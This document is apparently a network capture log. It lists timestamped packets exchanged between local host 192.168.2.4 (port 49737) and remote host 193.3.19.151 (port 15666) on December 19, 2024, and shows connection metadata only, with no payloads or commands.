Dec 19, 2024 08:52:47.057881117 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.057946920 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.120417118 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.120517969 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.120554924 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.120687962 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.120697975 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.120742083 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.120744944 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.120789051 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.120897055 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.121057987 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.121071100 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.121133089 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.121200085 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.121249914 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.121301889 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.121416092 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.121462107 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.121509075 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.121531010 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.121557951 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.121609926 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.121725082 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.121767044 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.121782064 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.121903896 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.122010946 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.122062922 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.122246981 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.122262001 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.122293949 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.122302055 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.122314930 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.122350931 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.122423887 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.122436047 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.122473955 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.122493029 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.122498035 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.122637987 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.122688055 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.122836113 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.122884989 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.122885942 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.123003006 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.123054028 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.123151064 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.123192072 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.123225927 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.123389006 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.123402119 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.123466015 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.123506069 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.123548985 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.123600006 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.123713970 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.123776913 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.123843908 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.123888969 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.123956919 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.124052048 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.124133110 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.124186039 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.124257088 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.124301910 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.124397993 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.124456882 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.124609947 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.124672890 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.124732018 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.124777079 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.124784946 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.124859095 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.124907017 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.124969006 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.125005960 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.125194073 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.125257015 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.125375986 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.125442028 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.125508070 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.125549078 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.125627995 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.125642061 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.125776052 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.125844002 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.125885963 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.125935078 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.126075029 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.126198053 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.126245975 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.126296997 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.126301050 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.126351118 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.126456022 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.126468897 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.126600981 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.126615047 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.126657963 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.126749992 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.126761913 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.126796961 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.126810074 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.126810074 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.126831055 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.126858950 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.126991034 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.127005100 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.127072096 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.127085924 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.127124071 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.127140045 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.127162933 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.127207994 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.127336025 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.127372026 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.127403021 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.127535105 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.127585888 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.127631903 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.127892971 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.127950907 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.128194094 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.128246069 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.128336906 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.128381968 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.128551006 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.128624916 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.128837109 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.128861904 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.128895998 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.129084110 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.129122019 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.129187107 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.129225969 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.129475117 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.129487038 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.129515886 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.129529953 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.129698992 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.129730940 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.129740953 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.129762888 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.129823923 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.129913092 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.130095005 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.130110025 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.130156040 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.130171061 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.130325079 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.130362034 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.130410910 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.130496025 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.130518913 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.130558014 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.130687952 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.130711079 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.130788088 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.130810976 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.130834103 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.130846024 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.130908012 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.130970001 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.131016970 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.131083965 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.131099939 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.131122112 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.131138086 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.131144047 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.131167889 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.131181955 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.131217957 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.131263018 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.131274939 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.131308079 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.131347895 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.131361961 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.131386995 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.131406069 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.131484985 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.131498098 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.131586075 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.131608963 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.131632090 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.131648064 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.131710052 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.131721973 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.131824970 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.131860018 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.131881952 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.132035971 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.132047892 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.132071972 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.132078886 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.132102013 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.132103920 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.132122040 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.132137060 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.132148027 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.132169962 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.132255077 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.132270098 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.132309914 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.132333040 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.132368088 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.132472992 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.132484913 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.132520914 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.132603884 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.132616043 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.132638931 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.132656097 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.132718086 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.132741928 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.132802010 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.132832050 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.132844925 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.132878065 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.132898092 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.132915974 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.132929087 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.132977962 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.132997036 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.133038998 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.133086920 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.133100033 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.133140087 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.133150101 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.133177996 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.133186102 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.133205891 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.133225918 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.133241892 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.133296967 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.133308887 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.133405924 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.133450985 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.133462906 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.133500099 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.133538961 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.133560896 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.133650064 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.133662939 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.133692026 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.133704901 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.133708000 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.133729935 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.133750916 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.133757114 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.133821964 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.133868933 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.133874893 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.133888960 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.133912086 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.133933067 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.133953094 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.133966923 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.134044886 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.134059906 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.134099960 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.134123087 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.134135008 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.134207010 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.134219885 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.134257078 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.134263039 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.134284973 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.134299994 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.134319067 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.134385109 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.134397030 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.134419918 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.134435892 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.134440899 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.134454012 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.134484053 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.134517908 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.134546995 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.134582043 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.134587049 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.134618998 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.134627104 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.134659052 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.134757042 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.134778976 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.134792089 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.134807110 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.134821892 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.134840965 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.134859085 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.134917021 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.135000944 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.135025978 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.135046005 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.135073900 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.135086060 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.135123014 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.135134935 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.135207891 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.135220051 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.135258913 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.135258913 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.135272980 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.135294914 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.135324955 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.135353088 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.135365963 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.135437965 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.135449886 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.135492086 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.135515928 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.135552883 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.135605097 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.135618925 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.135639906 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.135657072 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.135703087 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.135715961 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.135729074 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.135773897 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.135842085 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.135854006 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.135865927 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.135879040 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.135883093 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.135907888 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.135927916 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.135935068 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.135945082 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.135958910 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.135987043 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.136002064 CET	15666	49737	193.3.19.151	192.168.2.4
